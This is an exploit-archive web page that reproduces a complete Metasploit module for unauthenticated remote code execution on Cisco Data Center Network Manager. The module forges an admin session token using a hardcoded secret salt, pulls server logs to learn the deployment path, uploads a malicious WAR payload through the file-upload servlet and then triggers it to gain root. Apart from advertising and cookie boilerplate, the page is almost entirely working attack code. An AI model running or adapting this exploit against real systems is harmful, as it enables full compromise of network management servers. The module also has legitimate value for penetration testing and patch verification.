cisco data center network manager unauthenticated remote code execution (metasploit)

▸▸▸ Exploit & Vulnerability >>   remote exploit & java vulnerability




Online Vulnerability Scanner Tools
cisco data center network manager unauthenticated remote code execution (metasploit) Code Code... 
				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
      'Description'    => %q{
        DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
        An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
        directory and achieve remote code execution as root.
        This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
        versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
        directory for the WAR file upload.
        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
        (see References to understand why).
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-1619' ], # auth bypass
          [ 'CVE', '2019-1620' ], # file upload
          [ 'CVE', '2019-1622' ], # log download
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'Cisco DCNM 11.1(1)', {}
          ],
          [
            'Cisco DCNM 11.0(1)', {}
          ],
          [
            'Cisco DCNM 10.4(2)', {}
          ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => { 'WfsDelay' => 10 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 26 2019'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Connect with TLS', true]),
        OptString.new('TARGETURI', [true,  "Default server path", '/']),
        OptString.new('USERNAME', [true,  "Username for auth (required only for 11.0(1) and above", 'admin']),
        OptString.new('PASSWORD', [true,  "Password for auth (required only for 11.0(1) and above", 'admin']),
      ])
  end

  def check
    # at the moment this is the best way to detect
    # check if pmreport and fileUpload servlets return a 500 error with no params
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
      'vars_get'  =>
      {
        'token'  => rand_text_alpha(5..20)
      },
      'method' => 'GET'
    )
    if res && res.code == 500
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
        'method' => 'GET',
      )
      if res && res.code == 500
        return CheckCode::Detected
      end
    end

    CheckCode::Unknown
  end

  def target_select
    if target != targets[0]
      return target
    else
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'),
        'method' => 'GET'
      )
      if res && res.code == 200
        if res.body.include?('version":"11.1(1)')
          print_good("#{peer} - Detected DCNM 11.1(1)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[1]
        elsif res.body.include?('version":"11.0(1)')
          print_good("#{peer} - Detected DCNM 11.0(1)")
          print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
          return targets[2]
        elsif res.body.include?('version":"10.4(2)')
          print_good("#{peer} - Detected DCNM 10.4(2)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[3]
        else
          print_error("#{peer} - Failed to detect target version.")
          print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
          print_error(res.body)
          print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
          return targets[3]
        end
      end
      fail_with(Failure::NoTarget, "#{peer} - Failed to determine target")
    end
  end

  def auth_v11
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm/'),
      'method' => 'GET',
      'vars_get'  =>
      {
        'userName'  => datastore['USERNAME'],
        'password'  => datastore['PASSWORD']
      },
    )

    if res && res.code == 200
      # get the JSESSIONID cookie
      if res.get_cookies
        res.get_cookies.split(';').each do |cok|
          if cok.include?("JSESSIONID")
            return cok
          end
        end
      end
    end
  end

  def auth_v10
    # step 1: get a JSESSIONID cookie and the server Date header
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm/'),
      'method' => 'GET'
    )

    # step 2: convert the Date header and create the auth hash
    if res && res.headers['Date']
      jsession = res.get_cookies.split(';')[0]
      date = Time.httpdate(res.headers['Date'])
      server_date = date.strftime("%s").to_i * 1000
      print_good("#{peer} - Got sysTime value #{server_date.to_s}")

      # auth hash format:
      # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
      session_id = rand(1000..50000).to_s
      md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
        "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
      md5_str = Base64.strict_encode64(md5)

      # step 3: authenticate our cookie as admin
      # token format: sessionId.sysTime.md5_str.username
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
        'cookie' => jsession,
        'vars_get'  =>
        {
          'token'  => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
        },
        'method' => 'GET'
      )

      if res && res.code == 500
        return jsession
      end
    end
  end

  # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
  def get_war_path
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
      'method' => 'GET'
    )

    if res && res.code == 200
      tmp = Tempfile.new
      # we have to drop this into a file first
      # else we will get a Zip::GPFBit3Error if we use an InputStream
      File.binwrite(tmp, res.body)
      Zip::File.open(tmp) do |zis|
        zis.each do |entry|
          if entry.name =~ /jboss[0-9]*\.log/
            fdata = zis.read(entry)
            if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
              tmp.close
              tmp.unlink
              return $1.strip
            end
          end
        end
      end
    end
  end


  def exploit
    target = target_select

    if target == targets[2]
      jsession = auth_v11
    elsif target == targets[3]
      jsession = auth_v10
    end

    # targets[1] DCNM 11.1(1) doesn't need auth!
    if jsession.nil? && target != targets[1]
      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
    elsif target != targets[1]
      print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
    end

    war_path = get_war_path
    if war_path.nil? or war_path.empty?
      fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
    else
      print_good("#{peer} - Obtain WAR path from logs: #{war_path}")
    end

    # Generate our payload... and upload it
    app_base = rand_text_alphanumeric(6..16)
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    fname = app_base + '.war'
    post_data = Rex::MIME::Message.new
    post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"")
    post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"")
    post_data.add_part(war_payload,
                       "application/octet-stream", 'binary',
                       "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")
    data = post_data.to_s

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
      'method' => 'POST',
      'data'   => data,
      'cookie' => jsession,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    )

    if res && res.code == 200 && res.body[/#{fname}/]
      print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")

      sleep 10

      print_status("#{peer} - Executing payload...")
      send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, app_base),
        'method' => 'GET'
      )
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
    end
  end
end

Cisco data center network manager unauthenticated remote code execution (metasploit) Vulnerability / Exploit Source : Cisco data center network manager unauthenticated remote code execution (metasploit)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.